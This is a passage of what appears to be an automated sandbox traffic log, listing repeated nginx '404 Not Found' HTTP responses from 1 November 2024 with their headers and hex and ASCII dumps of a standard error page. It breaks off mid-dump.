61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:20 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:27 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:24:43 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:25:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 